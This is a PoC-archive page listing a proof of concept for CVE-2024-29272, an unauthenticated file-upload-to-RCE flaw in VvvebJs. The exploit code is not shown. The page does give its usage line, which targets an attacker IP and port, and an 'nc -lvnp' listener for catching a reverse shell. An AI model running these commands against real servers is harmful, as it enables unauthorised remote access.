Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-29272 PoC — VvvebJs 安全漏洞

Source
https://github.com/awjkjflkwlekfdjs/CVE-2024-29272
Associated Vulnerability
Title:VvvebJs 安全漏洞 (CVE-2024-29272)
Description:Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.
Readme
# CVE-2024-29272
This is a Proof-of-Concept for CVE-2024-29272, an unauthenticated arbritrary file upload vulnerability that leads to remote code execution on versions of VvvebJS < 1.7.5

usage:
```
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
```

in another terminal:
```
nc -lvnp <ATTACKER PORT>
```
File Snapshot

 [4.0K]  /data/pocs/d48267b7e774e6460153239fa5cb4373d333a8f1
├── [1.5K]  poc.py
└── [ 318]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →